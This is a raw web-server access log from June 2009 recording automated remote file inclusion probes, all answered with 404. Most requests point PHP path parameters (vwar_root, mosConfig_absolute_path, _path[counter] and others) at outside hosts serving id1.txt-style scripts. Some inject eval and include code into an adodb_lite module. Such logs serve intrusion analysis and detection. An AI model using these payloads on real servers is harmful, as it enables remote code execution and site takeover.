210.112.121.225 - - [04/Jun/2009:09:36:18 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
210.112.121.225 - - [04/Jun/2009:09:36:18 -0500] "GET /logs/access_log.1235174400//modules/vwar/admin/admin.php?vwar_root=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
116.254.252.16 - - [04/Jun/2009:09:38:21 -0500] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
116.254.252.16 - - [04/Jun/2009:09:38:21 -0500] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
116.254.252.16 - - [04/Jun/2009:09:38:21 -0500] "GET /logs/access_log.1240790400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 367 "-""Mozilla/5.0"
222.239.76.25 - - [04/Jun/2009:09:38:35 -0500] "GET /agenda2.php3?rootagenda=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
222.239.76.25 - - [04/Jun/2009:09:38:35 -0500] "GET /logs/agenda2.php3?rootagenda=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
222.239.76.25 - - [04/Jun/2009:09:38:35 -0500] "GET /logs/access_log.1235606400/agenda2.php3?rootagenda=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
78.111.80.18 - - [04/Jun/2009:09:39:00 -0500] "GET /add.php?APB_rp=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 290 "-""Mozilla/5.0"
78.111.80.18 - - [04/Jun/2009:09:39:00 -0500] "GET /logs/add.php?APB_rp=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
78.111.80.18 - - [04/Jun/2009:09:39:00 -0500] "GET /logs/access_log.1228608000/add.php?APB_rp=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
222.239.76.25 - - [04/Jun/2009:09:39:01 -0500] "GET /logs/access_log.1238889600/agenda2.php3?rootagenda=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
219.85.63.226 - - [04/Jun/2009:09:39:15 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://kimsungjin.co.kr/bbs/data/test.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
222.239.76.25 - - [04/Jun/2009:09:39:26 -0500] "GET /logs/agenda2.php3?rootagenda=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
222.239.76.25 - - [04/Jun/2009:09:39:26 -0500] "GET /agenda2.php3?rootagenda=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
222.239.76.25 - - [04/Jun/2009:09:39:26 -0500] "GET /logs/access_log.1235606400/agenda2.php3?rootagenda=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
222.239.76.25 - - [04/Jun/2009:09:39:26 -0500] "GET /logs/access_log.1238889600/agenda2.php3?rootagenda=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
78.111.80.18 - - [04/Jun/2009:09:39:53 -0500] "GET /logs/access_log.1234656000/add.php?APB_rp=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
78.111.80.18 - - [04/Jun/2009:09:39:53 -0500] "GET /logs/access_log.1234742400/add.php?APB_rp=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
78.111.80.18 - - [04/Jun/2009:09:40:25 -0500] "GET /logs/access_log.1228608000%20%20/add.php?APB_rp=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:09:41:57 -0500] "GET /logs/access_log.1233705600//include/footer.php?_path[counter]=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:09:41:57 -0500] "GET /logs//include/footer.php?_path[counter]=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:09:41:57 -0500] "GET /logs/access_log.1235952000//include/footer.php?_path[counter]=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:09:41:57 -0500] "GET //include/footer.php?_path[counter]=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
65.55.106.142 - - [04/Jun/2009:09:42:06 -0500] "GET /logs/access_log.1111881600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.23.158.226 - - [04/Jun/2009:09:43:27 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
77.221.130.2 - - [04/Jun/2009:09:43:30 -0500] "GET /logs//include/footer.php?_path[counter]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Jun/2009:09:43:30 -0500] "GET //include/footer.php?_path[counter]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
65.23.158.226 - - [04/Jun/2009:09:43:44 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:09:45:50 -0500] "GET //include/footer.php?_path[counter]=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:09:45:50 -0500] "GET /logs/access_log.1235952000//include/footer.php?_path[counter]=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:09:45:50 -0500] "GET /logs//include/footer.php?_path[counter]=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:09:45:50 -0500] "GET /logs/access_log.1233705600//include/footer.php?_path[counter]=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.150.79.146 - - [04/Jun/2009:09:46:08 -0500] "GET /logs//include/footer.php?_path[counter]=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
218.150.79.146 - - [04/Jun/2009:09:46:09 -0500] "GET //include/footer.php?_path[counter]=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
218.150.79.146 - - [04/Jun/2009:09:46:09 -0500] "GET /logs/access_log.1233705600//include/footer.php?_path[counter]=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.150.79.146 - - [04/Jun/2009:09:46:17 -0500] "GET /logs/access_log.1235952000//include/footer.php?_path[counter]=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
200.142.148.142 - - [04/Jun/2009:09:46:55 -0500] "GET /logs//include/footer.php?_path[counter]=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
200.142.148.142 - - [04/Jun/2009:09:46:55 -0500] "GET /logs/access_log.1233705600//include/footer.php?_path[counter]=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
200.142.148.142 - - [04/Jun/2009:09:46:55 -0500] "GET //include/footer.php?_path[counter]=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
200.142.148.142 - - [04/Jun/2009:09:47:07 -0500] "GET /logs/access_log.1235952000//include/footer.php?_path[counter]=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:09:48:29 -0500] "GET //include/footer.php?_path[counter]=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:09:48:29 -0500] "GET /logs/access_log.1233705600//include/footer.php?_path[counter]=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:09:48:29 -0500] "GET /logs//include/footer.php?_path[counter]=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:09:48:29 -0500] "GET /logs/access_log.1235952000//include/footer.php?_path[counter]=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
78.111.80.18 - - [04/Jun/2009:09:48:37 -0500] "GET /logs/access_log.1235260800/add.php?APB_rp=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
78.111.80.18 - - [04/Jun/2009:09:48:37 -0500] "GET /logs/access_log.1230595200/add.php?APB_rp=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
200.142.148.142 - - [04/Jun/2009:09:49:15 -0500] "GET /logs//include/footer.php?_path[counter]=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
200.142.148.142 - - [04/Jun/2009:09:49:15 -0500] "GET /logs/access_log.1233705600//include/footer.php?_path[counter]=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
200.142.148.142 - - [04/Jun/2009:09:49:28 -0500] "GET /logs/access_log.1235952000//include/footer.php?_path[counter]=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:09:49:46 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:09:49:46 -0500] "GET /logs/access_log.1240704000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:09:49:46 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:09:50:00 -0500] "GET /logs/access_log.1238112000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
77.221.130.2 - - [04/Jun/2009:09:51:25 -0500] "GET ///include/footer.php?_path[counter]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Jun/2009:09:51:25 -0500] "GET /logs///include/footer.php?_path[counter]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Jun/2009:09:51:32 -0500] "GET /logs/include/footer.php?_path[counter]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Jun/2009:09:51:32 -0500] "GET /include/footer.php?_path[counter]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
218.185.20.88 - - [04/Jun/2009:09:53:16 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:09:53:16 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:09:53:16 -0500] "GET /logs/access_log.1240704000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:09:53:21 -0500] "GET /logs/access_log.1238112000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
94.23.200.54 - - [04/Jun/2009:09:56:16 -0500] "GET /include/footer.php?_path[counter]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
94.23.200.54 - - [04/Jun/2009:09:56:16 -0500] "GET /logs/access_log.1233705600/include/footer.php?_path[counter]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
94.23.200.54 - - [04/Jun/2009:09:56:16 -0500] "GET /logs/include/footer.php?_path[counter]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
94.23.200.54 - - [04/Jun/2009:09:56:16 -0500] "GET /logs/access_log.1235952000/include/footer.php?_path[counter]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:09:57:44 -0500] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:09:57:50 -0500] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:09:57:50 -0500] "GET /logs/access_log.1228435200//vwar/convert/mvcw.php?step=1&vwar_root=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:09:58:30 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
201.232.54.48 - - [04/Jun/2009:09:58:30 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
66.226.153.1 - - [04/Jun/2009:09:58:30 -0500] "GET /include/footer.php?_path[counter]=http://www.aotronics.com/podcast/language//id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
66.226.153.1 - - [04/Jun/2009:09:58:30 -0500] "GET /logs/include/footer.php?_path[counter]=http://www.aotronics.com/podcast/language//id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
62.140.23.192 - - [04/Jun/2009:09:59:01 -0500] "GET /logs/access_log.1228435200//vwar/convert/mvcw.php?step=1&vwar_root=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:09:59:01 -0500] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:09:59:01 -0500] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:09:59:11 -0500] "GET /logs/db.php?path_local=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:09:59:11 -0500] "GET /logs/access_log.1240531200/db.php?path_local=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:09:59:11 -0500] "GET /logs/access_log.1240099200/db.php?path_local=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:09:59:11 -0500] "GET /db.php?path_local=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 289 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:09:59:15 -0500] "GET /db.php?path_local=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 289 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:09:59:15 -0500] "GET /logs/db.php?path_local=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:09:59:15 -0500] "GET /logs/access_log.1240099200/db.php?path_local=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:09:59:15 -0500] "GET /logs/access_log.1240531200/db.php?path_local=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:10:00:29 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:10:00:29 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:10:00:29 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:10:00:34 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:10:01:03 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:10:01:03 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:10:01:03 -0500] "GET /logs/access_log.1240444800/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:10:01:15 -0500] "GET /logs/access_log.1240185600/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:10:01:44 -0500] "GET //zero_vote/login.php?dir=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:10:01:44 -0500] "GET /logs/access_log.1232064000//zero_vote/login.php?dir=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:10:01:44 -0500] "GET /logs//zero_vote/login.php?dir=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:10:01:49 -0500] "GET /logs/access_log.1231718400//zero_vote/login.php?dir=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
190.144.44.36 - - [04/Jun/2009:10:02:00 -0500] "GET //include/footer.php?_path[counter]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
190.144.44.36 - - [04/Jun/2009:10:02:00 -0500] "GET /logs//include/footer.php?_path[counter]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
190.144.44.36 - - [04/Jun/2009:10:02:00 -0500] "GET /logs/access_log.1233705600//include/footer.php?_path[counter]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
190.144.44.36 - - [04/Jun/2009:10:02:34 -0500] "GET /logs/access_log.1235952000//include/footer.php?_path[counter]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
195.56.55.217 - - [04/Jun/2009:10:03:43 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
195.56.55.217 - - [04/Jun/2009:10:03:43 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
85.17.162.28 - - [04/Jun/2009:10:05:16 -0500] "GET /logs/access_log.1232064000//zero_vote/login.php?dir=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 330 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.17.162.28 - - [04/Jun/2009:10:05:16 -0500] "GET /logs//zero_vote/login.php?dir=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 308 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.17.162.28 - - [04/Jun/2009:10:05:16 -0500] "GET //zero_vote/login.php?dir=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 303 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
67.19.72.18 - - [04/Jun/2009:10:05:17 -0500] "GET ///include/footer.php?_path[counter]=http://mmobugs.net/img/fx29id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
67.19.72.18 - - [04/Jun/2009:10:05:17 -0500] "GET /logs///include/footer.php?_path[counter]=http://mmobugs.net/img/fx29id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
67.19.72.18 - - [04/Jun/2009:10:05:17 -0500] "GET /logs/access_log.1233705600///include/footer.php?_path[counter]=http://mmobugs.net/img/fx29id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
67.19.72.18 - - [04/Jun/2009:10:05:21 -0500] "GET /logs/access_log.1235952000///include/footer.php?_path[counter]=http://mmobugs.net/img/fx29id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:10:06:14 -0500] "GET /logs/access_log.1231718400//zero_vote/login.php?dir=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 330 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
69.94.125.100 - - [04/Jun/2009:10:07:28 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://glamourexchange.net/id1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.94.125.100 - - [04/Jun/2009:10:07:28 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://glamourexchange.net/id1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
69.94.125.100 - - [04/Jun/2009:10:07:28 -0500] "GET /logs/access_log.1242000000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://glamourexchange.net/id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
67.19.72.18 - - [04/Jun/2009:10:07:30 -0500] "GET /logs///include/footer.php?_path[counter]=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
67.19.72.18 - - [04/Jun/2009:10:07:30 -0500] "GET ///include/footer.php?_path[counter]=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
81.196.124.252 - - [04/Jun/2009:10:07:34 -0500] "GET /logs/access_log.1241740800/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
69.94.125.100 - - [04/Jun/2009:10:07:44 -0500] "GET /logs/access_log.1240358400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://glamourexchange.net/id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
77.221.130.2 - - [04/Jun/2009:10:07:47 -0500] "GET /logs/access_log.1233705600/footer.php?_path[counter]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Jun/2009:10:07:47 -0500] "GET /footer.php?_path[counter]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Jun/2009:10:07:47 -0500] "GET /logs/access_log.1235952000/footer.php?_path[counter]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Jun/2009:10:07:47 -0500] "GET /logs/footer.php?_path[counter]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Jun/2009:10:07:49 -0500] "GET /footer.php?_path[counter]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Jun/2009:10:07:49 -0500] "GET /logs/footer.php?_path[counter]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Jun/2009:10:07:49 -0500] "GET /logs/access_log.1233705600/footer.php?_path[counter]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Jun/2009:10:07:49 -0500] "GET /logs/access_log.1235952000/footer.php?_path[counter]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
65.55.106.116 - - [04/Jun/2009:10:08:35 -0500] "GET /logs/access_log.1148688000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
110.45.145.50 - - [04/Jun/2009:10:09:34 -0500] "GET /logs///include/footer.php?_path[counter]=http://mmobugs.net/img/fx29id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
110.45.145.50 - - [04/Jun/2009:10:09:34 -0500] "GET ///include/footer.php?_path[counter]=http://mmobugs.net/img/fx29id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
